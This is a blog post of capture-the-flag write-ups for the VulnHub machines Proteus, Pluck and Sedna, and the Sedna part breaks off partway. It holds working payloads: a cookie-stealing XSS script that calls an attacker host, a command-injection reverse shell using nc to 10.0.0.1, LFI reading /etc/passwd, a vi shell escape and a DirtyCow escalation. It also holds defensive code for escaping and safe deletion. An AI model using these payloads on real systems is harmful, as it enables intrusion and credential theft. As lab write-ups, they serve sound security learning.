<span style="background-color: white;">I ran nmap and two services stand out:</span><br />
<span style="background-color: white;">1. ssh ==> port 22</span><br />
<span style="background-color: white;">2. http ==> port 80</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://1.bp.blogspot.com/-7W0zQaQxjf4/WVeSud8yAtI/AAAAAAAAKfI/hnJQUnzQfJY5bmTwTojXQNAHS11x4luSgCK4BGAYYCw/s1600/nmapTcp.png" imageanchor="1"><img border="0" height="204" src="https://1.bp.blogspot.com/-7W0zQaQxjf4/WVeSud8yAtI/AAAAAAAAKfI/hnJQUnzQfJY5bmTwTojXQNAHS11x4luSgCK4BGAYYCw/s640/nmapTcp.png" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I tried checking over ssh but it seems only key based login is allowed.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I shifted my focus over to port 80.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://2.bp.blogspot.com/-sTNPkgcEgsM/WVeTQMoQAqI/AAAAAAAAKfQ/18OWKLdIvH43bHkgLL4KlR4IBZx28jNJQCK4BGAYYCw/s1600/webpage.PNG" imageanchor="1"><img border="0" height="272" src="https://2.bp.blogspot.com/-sTNPkgcEgsM/WVeTQMoQAqI/AAAAAAAAKfQ/18OWKLdIvH43bHkgLL4KlR4IBZx28jNJQCK4BGAYYCw/s640/webpage.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Immediately striking are two things:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">1. File upload feature</span><br />
<span style="background-color: white;">2. Login functionality</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">It seemed that the file upload check is based on MIME type, and only executable or shared library types are accepted for upload.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">First I tried uploading a normal file, and as output we get a binary analysis of the file.</span><br />
<span style="background-color: white;">Checking the output, I see that all the ASCII strings inside the binary file are rendered as-is on the webpage.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">This could be the first foothold. Probably HTML special characters are not escaped!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I immediately inject the following code into a binary file:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">echo "<b>I am here</b>" >> bFile</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">bFile is the binary/executable file</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">and dang! we have html rendered on page :D</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So now we have a clear case of XSS, and my next thought was: if there is XSS, could there be another client visiting the page other than myself?</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I uploaded another file, this time with an iframe injection such that it points to my evil server:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">echo "<iframe src='http://myIP'></iframe>" >> binaryFile</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">And I upload this binaryFile.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">On my local machine I keep monitoring my apache access logs and dang! second foothold!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I clearly see PhantomJS web automation trying to access my apache server from Proteus machine.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Now, connecting the dots: I see myself logged in as an anonymous user, and if there is another person visiting the website locally on the Proteus machine, could it be the site administrator?</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Time for cookie stealing again thanks to XSS!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I inject the following payload into the binary file:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">echo "<script>document.write('<img src=\"http://myIP?c=' + document.cookie + '\" />')</script>" >> binaryFile</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">And I wait quietly on my evil server (evil laugh hehehe)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">And voila! cookie stolen!</span><br />
<span style="background-color: white;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-FFp95wIwOUg/WVebg5VVF6I/AAAAAAAAKfg/T-eWgNIvxUYoUWWo3eIfGczdiE3My06agCK4BGAYYCw/s1600/stealing_session.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="background-color: white;"><img border="0" height="73" src="https://2.bp.blogspot.com/-FFp95wIwOUg/WVebg5VVF6I/AAAAAAAAKfg/T-eWgNIvxUYoUWWo3eIfGczdiE3My06agCK4BGAYYCw/s640/stealing_session.PNG" width="640" /></span></a></div>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I fire up Burp, intercept the login request, swap in the cookie value and dang!</span><br />
<span style="background-color: white;">Logged in as "malwareadm"</span><br />
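<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The chain above works because the sample's raw bytes are written into the page unescaped and the session cookie is readable from document.cookie. As an added example (my own code, not from the Proteus VM or from the post), the following Python shows the two render paths side by side and a Set-Cookie header that keeps the session value out of a script's reach; the sample bytes, the handler names and the cookie name are constructed for illustration.</span><br />

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample: a fake executable header followed by the same kind of
# cookie-exfiltration script the post appends to its binary file with echo.
SAMPLE_CONTENTS = (
    b"MZ\x90\x00\x03\x00 "
    b"<script>document.write('<img src=\"http://myIP?c=' + document.cookie + '\" />')</script>"
)

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def render_sample_vulnerable(contents: bytes) -> str:
    """Write the uploaded bytes straight into the page (the pattern the post exploits)."""
    return "<pre>" + contents.decode("latin-1") + "</pre>"


def render_sample_hardened(contents: bytes) -> str:
    """Escape every HTML-significant character so the browser shows text, never markup."""
    return "<pre>" + html.escape(contents.decode("latin-1"), quote=True) + "</pre>"


def contains_live_script(page: str) -> bool:
    """True if the rendered page still carries a <script> tag the browser would execute."""
    return SCRIPT_TAG.search(page) is not None


def session_cookie_header(value: str) -> str:
    """Set-Cookie value for the session (constructed name 'session').
    HttpOnly keeps it out of document.cookie, Secure keeps it off plain HTTP,
    SameSite=Strict stops it riding along on cross-site requests."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Strict"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print(render_sample_vulnerable(SAMPLE_CONTENTS))
    print(render_sample_hardened(SAMPLE_CONTENTS))
    print(session_cookie_header("constructed-session-id"))
```

<span style="background-color: white;">With escaping in place the automated PhantomJS visit still happens, but the injected script is displayed as text; with HttpOnly set, even a script that does run cannot read the session value, so there is nothing to swap into Burp.</span><br />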
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Okay, so till now it's some good progress and I am pretty satisfied, but what's next??</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The only additional functionality I notice is that this account has the ability to delete uploaded samples.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I run dirbuster/gobuster with the admin cookie included, but no more pages, no more functionality apart from this!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">This was where I hit a wall and couldn't think further.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The only thing that stood out was the deletion function.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I noticed that while deleting a file, the URL was of the form: http://proteusIP/delete/<base64-value></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">This base64-encoded value, when decoded, gave a timestamp-like number with a "." character at the end.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">e.g. : "54752987376." (excluding quotes)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Here I spent ages wondering what to do next!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">[Screenshot of the filenames which are stored in Proteus as samples]</span><br />
<a href="http://1.bp.blogspot.com/-5BWNkjc8Gek/WVeep93oLpI/AAAAAAAAKf0/5YlMLeyTmdoM6TjUfL9q-Gei-fZHmLcyACK4BGAYYCw/s1600/weird_filenames.PNG" imageanchor="1" style="background-color: white;"><img border="0" height="80" src="https://1.bp.blogspot.com/-5BWNkjc8Gek/WVeep93oLpI/AAAAAAAAKf0/5YlMLeyTmdoM6TjUfL9q-Gei-fZHmLcyACK4BGAYYCw/s640/weird_filenames.PNG" width="640" /></a><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Finally, by a hint from my friend, I was pointed in the direction of fuzzing the base64-decoded value, so I started putting in random stuff but got 404s instead.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Next I tried keeping a valid value but appending some characters, and finally encoding it with the Linux base64 command,</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">e.g.: </span><br />
<span style="background-color: white;">"654239019471.id" --> didn't work!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">"134253687542id" --> didn't damn work!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">"45324599572.;id" --> dang!! This worked.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">(note that all the numeric values shown above pertain to valid file names; nonexistent file names won't work!)</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I got id = 33 (www-data) user, and this is where the command injection lies!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I wasted no time by appending the netcat reverse shell, but damn! that didn't work as the Proteus netcat does not have the "-e" option, so what to do!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I appended the following to the file name I wanted to delete:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">"246526752853.;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f"</span><br />
<span style="background-color: white; color: #222222; white-space: pre-wrap;"><br /></span>
<span style="background-color: white;">The above value was base64-encoded and the request looked like the one below:</span><br />
<span style="background-color: white; color: #222222; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;">http://proteus_IP/delete/MjQ2NTI2NzUyODUzLjtybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC4wLjAuMSAxMjM0ID4vdG1wL2Y=</span></span><br />
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;"><br /></span></span>
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;">On the other hand, my netcat listener was fired up and dang!</span></span><br />
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;">Shell is OBTAINED :D</span></span><br />
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;"><br /></span></span>
<span style="background-color: white; white-space: pre-wrap;"><span style="color: #222222;"><a href="http://1.bp.blogspot.com/-vXzVwWuk9nE/WVefSJEfXcI/AAAAAAAAKgA/-aUcM3QNbZ4SHj7nR274I4R_5Z2fUWeRwCK4BGAYYCw/s1600/shelled.PNG" imageanchor="1"><img border="0" height="302" src="https://1.bp.blogspot.com/-vXzVwWuk9nE/WVefSJEfXcI/AAAAAAAAKgA/-aUcM3QNbZ4SHj7nR274I4R_5Z2fUWeRwCK4BGAYYCw/s640/shelled.PNG" width="640" /></a></span></span><br />
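<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The delete URL has the classic shape of command injection: a base64 path segment is decoded and the resulting filename ends up inside a shell command, so a ";" in the name starts a second command. As an added example (mine, not the Proteus application's code), the Python below contrasts the command string such a handler would build with a handler that allow-lists the name and deletes without any shell. The samples directory, the file names and the function names are constructed; the name pattern follows the timestamp-like names shown above.</span><br />

```python
import base64
import binascii
import os
import re
import tempfile

# The post shows sample names that decode to a number followed by "." (e.g. "54752987376.").
# The allow-list accepts exactly that shape; ';', '/', spaces and anything else are rejected.
SAMPLE_NAME = re.compile(r"[0-9]{1,20}\.")


def decode_delete_token(token: str) -> str:
    """Decode the base64 segment of /delete/<token>, refusing anything that is not clean base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError) as exc:
        raise ValueError("malformed delete token") from exc


def encode_token(name: str) -> str:
    """Build the URL segment the way the post does (base64 of the decoded name)."""
    return base64.b64encode(name.encode("utf-8")).decode("ascii")


def build_command_vulnerable(samples_dir: str, token: str) -> str:
    """The command line a naive handler would pass to the shell. Returned here, never executed:
    with shell=True a decoded name like '45324599572.;id' becomes 'rm ...;id', two commands."""
    return f"rm {samples_dir}/{decode_delete_token(token)}"


def delete_sample_hardened(samples_dir: str, token: str) -> bool:
    """Delete a sample by token without a shell. Returns True if a file was removed."""
    name = decode_delete_token(token)
    if not SAMPLE_NAME.fullmatch(name):
        raise ValueError(f"rejected sample name: {name!r}")
    base = os.path.realpath(samples_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(target) != base:   # belt and braces: the regex already forbids '/'
        raise ValueError("path escapes the samples directory")
    try:
        os.remove(target)                 # the name is only ever a path component
    except FileNotFoundError:
        return False
    return True


def token_is_accepted(samples_dir: str, token: str) -> bool:
    """True if the hardened handler would act on the token at all (whether or not the file exists)."""
    try:
        delete_sample_hardened(samples_dir, token)
    except ValueError:
        return False
    return True


def demo() -> dict:
    """Constructed samples directory: one valid file, then a benign and an injected token."""
    with tempfile.TemporaryDirectory() as samples:
        good = "54752987376."
        open(os.path.join(samples, good), "wb").close()
        injected = encode_token("45324599572.;id")
        return {
            "vuln_cmd": build_command_vulnerable(samples, injected),
            "deleted": delete_sample_hardened(samples, encode_token(good)),
            "still_there": os.path.exists(os.path.join(samples, good)),
            "injection_accepted": token_is_accepted(samples, injected),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

<span style="background-color: white;">The regex is the real fix: once the decoded name can only be digits and a dot, there is nothing left for the shell to interpret, and using os.remove instead of a shell command means there is no shell in the path at all. The realpath check is there for the day someone loosens the regex.</span><br />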
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Next step: Privilege Escalation</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">So, now we have an interactive shell, and enumerating the users I see the folder malwareadm in the /home directory.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Under this folder is the JS file which automates the page-visiting activity of malwareadm.</span><br />
<span style="background-color: white;">Reading this file, we can see the URL-encoded password of malwareadm.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I try logging in as malwareadm and am successful!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Checking the permissions of malwareadm, it seems it is a part of adm, so just doing a sudo -i made me the root user!!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Pwn4g3!</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://3.bp.blogspot.com/-_-y0AjnHfEY/WVegJ33yD8I/AAAAAAAAKgM/fF21pPlOlUQ-Ql2HACUhhMof1QgXvw14QCK4BGAYYCw/s1600/rooting.PNG" imageanchor="1"><img border="0" height="236" src="https://3.bp.blogspot.com/-_-y0AjnHfEY/WVegJ33yD8I/AAAAAAAAKgM/fF21pPlOlUQ-Ql2HACUhhMof1QgXvw14QCK4BGAYYCw/s640/rooting.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The flag is under the /root folder and is a png file:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><a href="http://4.bp.blogspot.com/-Kj83QqTs88w/WVegVgKIMdI/AAAAAAAAKgU/vMYviiWuM-UcVjw7NRaK95m57qam36a0ACK4BGAYYCw/s1600/flag.PNG" imageanchor="1"><img border="0" height="300" src="https://4.bp.blogspot.com/-Kj83QqTs88w/WVegVgKIMdI/AAAAAAAAKgU/vMYviiWuM-UcVjw7NRaK95m57qam36a0ACK4BGAYYCw/s640/flag.PNG" width="640" /></a></span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The privilege escalation was kinda anti-climactic. I was anticipating more of a challenge there.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">My thoughts:</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">I clearly had lost direction once I logged in as malwareadm, and even though the delete functionality stood out, I just couldn't think what to do next with it.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">The machine provided a good level of challenge to me and I was quite thrilled and satisfied as I completed this challenge.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;">Thanks ivanvza for creating this vulnerable machine and thanks to vulnhub for hosting it.</span><br />
<span style="background-color: white;"><br /></span>
<span style="background-color: white;"> -n1ghTcr4wl3r </span><br />
<span style="background-color: white;"><br /></span>
<br /></div>
Angkan, http://www.blogger.com/profile/18370393056318837500<br />
Pluck w00t! (posted 2017-03-17T16:38:00.003-07:00, updated 2017-03-17T16:41:08.366-07:00)<div dir="ltr" style="text-align: left;" trbidi="on">
Time to Pluck!<br />
<br />
Though a bit late, I decided to give this machine a try!<br />
<br />
As with almost every machine, I began with arp-scan/netdiscover:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-IPUYDQnOYek/WMxujf7ArII/AAAAAAAAKYQ/fZJYMQKTErswf5VNTXB0jTlxnb75FpeEgCLcB/s1600/pluck_arpScan.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="55" src="https://4.bp.blogspot.com/-IPUYDQnOYek/WMxujf7ArII/AAAAAAAAKYQ/fZJYMQKTErswf5VNTXB0jTlxnb75FpeEgCLcB/s320/pluck_arpScan.PNG" width="320" /></a></div>
<br />
Once this is done, next I try to do a port scan on the host.<br />
<br />
I began with the TCP scan while the UDP scans, which take more time, ran in the background.<br />
Since port 80 was open, I ran nikto in another window.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-P2_BPrpEjC0/WMxvS5WkyCI/AAAAAAAAKYY/BempN5eu70UaBHGAo4yRKFfvBxtAOOEjgCLcB/s1600/pluck_Nmap.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="95" src="https://4.bp.blogspot.com/-P2_BPrpEjC0/WMxvS5WkyCI/AAAAAAAAKYY/BempN5eu70UaBHGAo4yRKFfvBxtAOOEjgCLcB/s320/pluck_Nmap.PNG" width="320" /></a></div>
<br />
Once this was done, I moved on to check banners on each service.<br />
<br />
SSH didn't give any banner, and neither did MySQL or the LLMNR protocol, so I tried to enumerate the web.<br />
<br />
Just before I went to check the web service, I looked at the nikto results and they were interesting!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-WbCcduFvwXs/WMxv2IDzZxI/AAAAAAAAKYg/BgEw8F6MxK8qzSQZD4axTh3KOraofIxuwCEw/s1600/pluck_nikto_lfi.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://3.bp.blogspot.com/-WbCcduFvwXs/WMxv2IDzZxI/AAAAAAAAKYg/BgEw8F6MxK8qzSQZD4axTh3KOraofIxuwCEw/s320/pluck_nikto_lfi.PNG" width="320" /></a></div>
<br />
Now, this was very interesting, an LFI!!<br />
<br />
Meanwhile I had also tried fuzzing the admin page on the web service and it revealed SQL injection:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-DxYH7cedgiA/WMxwP7w70SI/AAAAAAAAKYk/EksrGEGGJisiby11LwXYnJ8whRKn9a_YQCLcB/s1600/pluck_sqlMessage.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://2.bp.blogspot.com/-DxYH7cedgiA/WMxwP7w70SI/AAAAAAAAKYk/EksrGEGGJisiby11LwXYnJ8whRKn9a_YQCLcB/s320/pluck_sqlMessage.PNG" width="320" /></a></div>
<br />
Now, I had two vectors, so I thought let's begin with the LFI.<br />
<br />
Requesting /etc/passwd dumped all of its contents!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ZycajneXpGo/WMxwdZfFSpI/AAAAAAAAKYo/fIy8EJ8x_Y4rdrXH3CjZx25IcEQ96dhcACLcB/s1600/pluck_lfi.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://3.bp.blogspot.com/-ZycajneXpGo/WMxwdZfFSpI/AAAAAAAAKYo/fIy8EJ8x_Y4rdrXH3CjZx25IcEQ96dhcACLcB/s320/pluck_lfi.PNG" width="320" /></a></div>
<br />
But trying the LFI on other files like the Apache logs etc. was not possible (permission issue??)<br />
<br />
This was when something caught my eye.... There was an entry in /etc/passwd called backup-user!<br />
<br />
Moreover, there was a script associated with it!<br />
<br />
Reading the same script revealed another gateway.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-hMfeRC77Q9I/WMxw-6RznLI/AAAAAAAAKYw/dhdrO3DoDxgt8MdbLbLeAON43sK7Ph4MgCLcB/s1600/pluck_clue1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://3.bp.blogspot.com/-hMfeRC77Q9I/WMxw-6RznLI/AAAAAAAAKYw/dhdrO3DoDxgt8MdbLbLeAON43sK7Ph4MgCLcB/s320/pluck_clue1.PNG" width="320" /></a></div>
<br />
<br />
<br />
TFTP was going to come into the picture, but was it open? Dang! The Nmap UDP scan showed me port 69 for TFTP was open!<br />
<br />
Next I just get the backup file!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-znQSKsGv9z4/WMxxOsIwZfI/AAAAAAAAKY0/MR0xY6F9bAwUBkoRsOb32ISBxszLFHj9ACLcB/s1600/pluck_backup_tar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://2.bp.blogspot.com/-znQSKsGv9z4/WMxxOsIwZfI/AAAAAAAAKY0/MR0xY6F9bAwUBkoRsOb32ISBxszLFHj9ACLcB/s320/pluck_backup_tar.PNG" width="320" /></a></div>
<br />
<br />
Now checking the backup.tar file I see the /home directory. Looking further, there are SSH keys in paul's directory. I change the permissions on the keys and try all 4 private keys one by one.<br />
<br />
Key number 4 works for me and I log in, but the login is not a shell but a command-line menu :D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-g6FC-MvIGzg/WMxySPfHvCI/AAAAAAAAKZI/2mqJV5beO5YJos-XcAdiuaSrtxfvJUQHACLcB/s1600/pluck_pdmenu.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://2.bp.blogspot.com/-g6FC-MvIGzg/WMxySPfHvCI/AAAAAAAAKZI/2mqJV5beO5YJos-XcAdiuaSrtxfvJUQHACLcB/s320/pluck_pdmenu.PNG" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-TsMJgnyojFQ/WMxxvH45qVI/AAAAAAAAKZA/uQD1KO-zosEKDfzHqDB_lY0LlUYTmY-1ACLcB/s1600/pluck_pdmenu_1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://1.bp.blogspot.com/-TsMJgnyojFQ/WMxxvH45qVI/AAAAAAAAKZA/uQD1KO-zosEKDfzHqDB_lY0LlUYTmY-1ACLcB/s320/pluck_pdmenu_1.PNG" width="320" /></a></div>
<br />
<br />
Next step: I look at the various options, but Edit file caught my eye! The editor was vi in this case, so I can do a shell escape sequence.<br />
<br />
:set shell=/bin/bash<br />
:shell<br />
<br />
And I get an interactive session!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-LtNaKG-dGLo/WMxyGAxTt-I/AAAAAAAAKZE/3ONr8WnmmZ0hKxtvjAZ4cvai3rv5c_nZwCLcB/s1600/pluck_limited_shell.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="75" src="https://2.bp.blogspot.com/-LtNaKG-dGLo/WMxyGAxTt-I/AAAAAAAAKZE/3ONr8WnmmZ0hKxtvjAZ4cvai3rv5c_nZwCLcB/s320/pluck_limited_shell.PNG" width="320" /></a></div>
<br />
<br />
Next, priv escalation!<br />
<br />
I see it's a very new kernel.<br />
Searching exploits for this kernel gave me one DoS exploit, but that won't work. I have to r00t!<br />
<br />
Checking file permissions I see the setuid bit on exim! That could be one vector (maybe???)<br />
<br />
However, I thought, why not try kernel exploits? DirtyCow was a pure random guess!<br />
<br />
And it worked!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-JtdTod4w5Ls/WMxy_WfhO_I/AAAAAAAAKZQ/_M05_WG-SjsnRe3qjvrysXSlDMlQV0XKACLcB/s1600/pluck_privesc.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://2.bp.blogspot.com/-JtdTod4w5Ls/WMxy_WfhO_I/AAAAAAAAKZQ/_M05_WG-SjsnRe3qjvrysXSlDMlQV0XKACLcB/s320/pluck_privesc.PNG" width="243" /></a></div>
<br />
<br />
<br />
w00t w00t!<br />
<br />
And flag is captured!<br />
<br />
Overall an awesome machine and very satisfying! Reminds me of my OSCP frustration days!<br />
<br />
Thanks vulnhub 4 hosting and @ryanoberto for making this VM!<br />
<br />
-n!ghtcr4wl3r</div>
Angkan, http://www.blogger.com/profile/18370393056318837500<br />
Post of 2017-03-17T01:02:00.002-07:00 (updated 2017-03-17T02:18:02.960-07:00)<div dir="ltr" style="text-align: left;" trbidi="on">
I picked up Sedna and these were the steps:<br />
<br />
Like any machine, starting with arp-scan to first know the machine IP:<br />
<br />
arp-scan -l<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-XAWlrTH_nnE/WMubUG6kH7I/AAAAAAAAKVY/qlS0e6l6VdcPdNj_S4_DUZlVPauYxFsPgCLcB/s1600/sedna_arpscan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="62" src="https://4.bp.blogspot.com/-XAWlrTH_nnE/WMubUG6kH7I/AAAAAAAAKVY/qlS0e6l6VdcPdNj_S4_DUZlVPauYxFsPgCLcB/s320/sedna_arpscan.png" width="320" /></a></div>
<br />
<br />
The machine got detected at 192.168.137.152<br />
<br />
The next step was to run an nmap scan:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-CxwVTRI2SU0/WMubfWJi_pI/AAAAAAAAKVc/vPno3jCfGTULFRCfZeHim9WtutBHJSiqwCLcB/s1600/sedna_namp_scan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://1.bp.blogspot.com/-CxwVTRI2SU0/WMubfWJi_pI/AAAAAAAAKVc/vPno3jCfGTULFRCfZeHim9WtutBHJSiqwCLcB/s320/sedna_namp_scan.png" width="320" /></a></div>
<br />
<br />
From here, I decided that I shall be concentrating on port 80.<br />
<br />
First checking the webpage:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-S7VxEyPPW1Y/WMucIdFjvDI/AAAAAAAAKVk/8qatVeGaNZI-wCFJHNS2wx2Wxji1CZYzQCLcB/s1600/sedna_sedna.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://4.bp.blogspot.com/-S7VxEyPPW1Y/WMucIdFjvDI/AAAAAAAAKVk/8qatVeGaNZI-wCFJHNS2wx2Wxji1CZYzQCLcB/s320/sedna_sedna.png" width="320" /></a></div>
<br />
<br />
I decided I shall have a peek at the robots.txt as well:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-XUPltUZ4KFs/WMub836sYdI/AAAAAAAAKVg/hvL2-XYy5ioaJuZUc-tjnNTp1W5T3NnYwCLcB/s1600/sedna_robots.txt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://4.bp.blogspot.com/-XUPltUZ4KFs/WMub836sYdI/AAAAAAAAKVg/hvL2-XYy5ioaJuZUc-tjnNTp1W5T3NnYwCLcB/s320/sedna_robots.txt.png" width="320" /></a></div>
<br />
Going to /Hackers gave a 404 Not Found! Damn! :D<br />
<br />
Meanwhile in background, I was running gobuster.<br />
<br />
Doing web enumeration and checking web page sources didn't reveal much!<br />
I decided to check my gobuster results:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-z7uEa9FlK9g/WMuceyvmfOI/AAAAAAAAKVo/AWrcNciPha0geTzqQjeJMQnTPbr2n8tyQCLcB/s1600/sedna_dirbuster.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://3.bp.blogspot.com/-z7uEa9FlK9g/WMuceyvmfOI/AAAAAAAAKVo/AWrcNciPha0geTzqQjeJMQnTPbr2n8tyQCLcB/s400/sedna_dirbuster.png" width="400" /></a></div>
<br />
Manually enumerating the folders dirbuster pointed at, it quickly became clear that BuilderEngine was running.<br />
<br />
Next, a searchsploit revealed an exploit for arbitrary upload in BuilderEngine.<br />
<div class="separator" style="clear: both; text-align: center;">
